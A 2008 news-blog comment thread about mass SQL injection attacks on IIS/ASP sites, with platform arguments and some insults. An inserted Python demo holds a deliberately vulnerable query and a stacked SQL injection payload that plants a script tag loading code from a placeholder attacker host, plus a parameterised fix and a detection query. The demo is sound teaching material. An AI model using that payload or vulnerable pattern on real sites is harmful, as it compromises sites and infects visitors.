Recommended add-ons are rotated every 3-4 weeks not to stagnate and be unfair to new add-ons.

BTW, NoScript *is currently* in the list of recommended add-ons:
https://addons.mozilla.org/en-US/firefox/recommended

Posted by: Giorgio Maone | April 27, 2008 6:14 AM

I am running IE7 ver. 7.0.6001.18000 on Vista Home Premium SP1.

Control Panel>Internet Options>Security Tab>Custom Level Button>Scroll to Scripting Section>Under Active Scripting click disable. Restart all instances of IE7.

No more scripts!

Now, why do web site owners, web site creators, and the folks who place all this active content in web pages not want you to do this?

Because it will block almost all their ads!

Go figure!

I do hope that MS takes note of the release of information about these attacks and uses its rights as a trademark holder to stop all sites who act in such a way from using any MS logo or trademarks in any commercial publications for profit. I would do it now.

BTW, this page loads in 1/10th the time with no ads! How nice!

Posted by: Master Guru | April 27, 2008 9:52 AM

It's essentially bad programming because of common practice of irresponsible programming with ASP/IIS. It's not the technology per se. Linux/PHP is much more secure, but unrelated to this on the surface. When malware gets auto-installed on unpatched poorly maintained PCs running Windows, personal data of the attacked PC is stolen. That is where Linux prevents further damage. For other reasons too, Linux is better. But in this case, making your PC an unknowing partner to spreading many spyware and malware infections is easy on Windows and not on Linux.

Finally, the open source nature of Linux based programs means that you do not have to wait for Microsoft to accept, analyse and then patch the system. Linux and opensource code is watched daily, with "paranoid level security" by literally more than thousands of *experts*, not a hundred-strong security team already overburdened with flaws and inconsistencies. That's why Linux is better in the overall picture, both for end users and for Linux programmers.

Posted by: samuel emmanuel | April 27, 2008 3:06 PM

This is a great time to buy a Mac.

Posted by: Ken | April 27, 2008 3:17 PM | Report abuse

These comments got way off topic -- this is a server-side issue, not client-side. Using your fancy NoScript plugins to protect your browser is not going to fix the issues discussed in the article.

-posted from my stable and secure Mac

Posted by: coolfactor | April 27, 2008 5:10 PM | Report abuse

man, whew, thank god for Ubuntu Linux. i'd forgotten what an infection/hack was like.

Posted by: Neo | April 27, 2008 5:43 PM | Report abuse

Only idiots develop applications that are susceptible to SQL injection. I can't tell you how many "senior level developers" I have met that don't know what SQL injection is. UK web developers, have you heard of using DB parameters? Sheesh.

Posted by: MC | April 27, 2008 6:05 PM | Report abuse

WoW!!

Buy a Mac

Posted by: HotinPlaya | April 27, 2008 9:06 PM | Report abuse

It's scary how someone with such a limited and bigoted knowledge can write such tripe. Did you realise that in a recent hack competition featuring mac, pc and linux boxes the MAC WAS THE FIRST TO GET HACKED, AND IN 30 MINUTES! http://www.news.com/2100-7349_3-6178131.html.
If you want to know the truth about Mac, then learn from the guy who invented the personal computer (read pc, mac and commodore etc) http://www.commodore.ca/history/people/chuck_peddle/chuck_peddle.htm . Pay attention to his comments on Steve Jobs and Bill Gates near the end of the article.

Posted by: Marcus | April 27, 2008 9:47 PM | Report abuse

>thank god for Ubuntu Linux. i'd forgotten what an infection/hack was like.

Neo - I'll echo Marcus's comment -
"It's scary how someone with such a limited and bigoted knowledge can write such tripe."

Phishing sites loaded on otherwise legit sites run about 10:1 running on LAMP instead of IIS. Did you even read and understand any of the information in this article and comments?

Posted by: Moike | April 28, 2008 8:25 AM | Report abuse

"Only idiots develop applications that are..."

Not everyone is as smart and knowledgeable as you. These folks are not idiots; ignorant, yes, but not idiots. They look to folks like us to help them, not demean them.


Posted by: Tim | April 28, 2008 11:52 AM | Report abuse

Giorgio: well done, sir, thank you!

@ Master Guru:
>>Now, why do web site owners, web site creators, and the folks who place all this active content in web pages not want you to do this?

_Do_ the parties you cite not want us to do this? What evidence do you adduce for this sweeping generalization?

OTOH, we have the evidence of Microsoft's own words that _they_ don't want you to do this. For example:
"Reduced security settings can result in security risk, whereas increased security settings can reduce functionality."
http://support.microsoft.com/kb/174360

>>Because it will block almost all their ads!
>>
>>Go figure!

By your own reasoning, would that include Silverlight, or would it not?
http://www.innerexception.com/2008/04/where-is-silverlight-nag-install.html

Posted by: Mark Odell | April 28, 2008 2:14 PM | Report abuse

@ coolfactor:
>>Using your fancy NoScript plugins to protect your browser are not going to fix the issues discussed in the article.

It's not intended to; it's intended to limit collateral damage incurred by visitors to sites which _do_ have those issues.

>>-posted from my stable and secure Mac

....with its Safari instance freshly-patched, one hopes.
http://www.eweek.com/c/a/Security/Apple-Patches-MacBook-Air-Hijack-Flaw/

@ Marcus:
>>Did you realise that in a recent hack competition featuring mac, pc and linux boxes the MAC WAS THE FIRST TO GET HACKED, AND IN 30 MINUTES!

Did you realise that the Mac was hacked through _a Safari vuln_, involving (wait for it) JavaScript?

Did you realise that Apple have already patched this vuln? (see link above)

>>It's scary how someone with such a limited and bigoted knowledge can write such tripe.

I couldn't agree more.

Posted by: Mark Odell | April 28, 2008 2:49 PM | Report abuse

Any version of Linux is much safer to use as a desktop - next to no spyware, viruses etc.

"Phishing sites loaded on otherwise legit sites run about 10:1 running on LAMP instead of IIS. Did you even read and understand any of the information in this article and comments?"

- All this says is that Apache servers were used and the vulnerability was with Apache, not Linux - also phishing worms, etc. still only infect Windows machines, even if they are hosted on a Linux server.

I.e. Linux desktops are the safest to use.

Only a moran would use Windows....

Posted by: yossarianuk | April 29, 2008 5:04 AM | Report abuse

>All this says is that apache servers were used and the vulnerbility was with apache not linux -

If you'll read this article and comments, you'll realize that Apache itself is not at fault for SQL injections. Both platforms are susceptible to SQL injections.

> also Phishing worms,etc still only infect Windows machines - even if they are hosted on a Linux server .

A Linux desktop is just as susceptible to Phishing sites as any other machine.

> Only a moran would use Windows....
Hee hee - I won't touch that one...

Posted by: Moike | April 29, 2008 2:08 PM | Report abuse

This article is misleading. How is Microsoft IIS responsible for SQL injection attacks? It isn't, the programmers who created the poorly written web applications are. Apache/PHP is just as vulnerable to SQL injection.

Posted by: Ryan B | April 29, 2008 6:32 PM | Report abuse
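The point MC makes about "DB parameters" and that Ryan B makes about the application, not the web server, being at fault is easiest to see side by side. The following is an added, illustrative example; it is not code from the article or from any commenter. It is deliberately platform-neutral: a hypothetical hit-counter pastes a request parameter into the SQL text the way classic ASP pages often did, and Python's sqlite3 executescript() stands in for a database driver that runs every statement in a batch (ADO against SQL Server does; that equivalence is an assumption of this demo). The payload appends a script tag to every article body, which is the shape of a mass injection; the script host in the tag is a placeholder, not a real domain. The hardened version validates and binds the value, and a small check lists rows that already carry a script tag, which is the query a site owner would run to see whether they were hit.

```python
import sqlite3

# Constructed sample content, standing in for a site's article table.
SAMPLE_ARTICLES = [
    (1, "Council minutes", "The council met on Tuesday."),
    (2, "Road closures", "High Street is closed for resurfacing."),
]

# Placeholder for the attacker's script host (hypothetical, not a real domain).
INJECTED_TAG = '<script src="http://attacker.invalid/1.js"></script>'

# Stacked-query payload of the kind used in mass injections: close off the
# intended statement, append the tag to every body, comment out the remainder.
PAYLOAD = "1; UPDATE articles SET body = body || '" + INJECTED_TAG + "'; --"


def fresh_db():
    """In-memory database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, "
        "body TEXT, views INTEGER DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO articles (id, title, body) VALUES (?, ?, ?)", SAMPLE_ARTICLES
    )
    conn.commit()
    return conn


def record_view_vulnerable(conn, article_id):
    """Deliberately vulnerable: the request value is concatenated into the SQL.
    executescript() mimics a driver that executes the whole batch (assumption:
    this is how ADO's Connection.Execute behaves against SQL Server)."""
    sql = "UPDATE articles SET views = views + 1 WHERE id = " + article_id + ";"
    conn.executescript(sql)
    conn.commit()


def record_view_safe(conn, article_id):
    """Hardened: check the type, then bind the value as a parameter so the
    database never parses attacker-supplied text as SQL."""
    try:
        aid = int(article_id)
    except (TypeError, ValueError):
        raise ValueError("article id must be an integer")
    conn.execute("UPDATE articles SET views = views + 1 WHERE id = ?", (aid,))
    conn.commit()


def find_injected_rows(conn):
    """Site-owner check: ids of rows whose body already contains a <script> tag."""
    rows = conn.execute(
        "SELECT id FROM articles WHERE lower(body) LIKE '%<script%' ORDER BY id"
    ).fetchall()
    return [r[0] for r in rows]


def run_demo():
    """Send the same payload to both versions and report what each did."""
    vuln = fresh_db()
    record_view_vulnerable(vuln, PAYLOAD)

    safe = fresh_db()
    rejected = False
    try:
        record_view_safe(safe, PAYLOAD)
    except ValueError:
        rejected = True

    return {
        "vulnerable_injected_ids": find_injected_rows(vuln),
        "safe_rejected_payload": rejected,
        "safe_injected_ids": find_injected_rows(safe),
    }


if __name__ == "__main__":
    print(run_demo())
```

Running it shows the concatenating version leaves a script tag in every row while the parameterised version rejects the value outright; even without the int() check, a bound parameter is compared as data, so the UPDATE inside the payload never reaches the parser. The same split applies on PHP/MySQL or any other stack: the database driver is not what makes the difference, the way the query is built is.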

@BP: I was suggesting switching to Linux on the desktop above to avoid being victimized on the user's end.

You said: "as if sql injection attacks can be prevented by switching to linux or apache."

So, I wasn't (maybe other commenters were) talking about the server side.

Posted by: Delafield | May 2, 2008 1:18 PM | Report abuse

In the past two weeks I have received a vast number of "Returned Messages" noted as errors, these in fact messages that I had NEVER SENT! Over a period of 36 hours I got 166 returned messages in this manner!
Even now I am getting five or six daily that are NOT of my origin!

Posted by: Eric.Frith | May 11, 2008 3:02 AM | Report abuse

Hey, there are people out there that try to ruin everything for everyone. That's not good. What is it in their mind that they want?
Maybe they just think with their brain in their anal gland.

Posted by: robbi | May 11, 2008 2:13 PM | Report abuse


© 2010 The Washington Post Company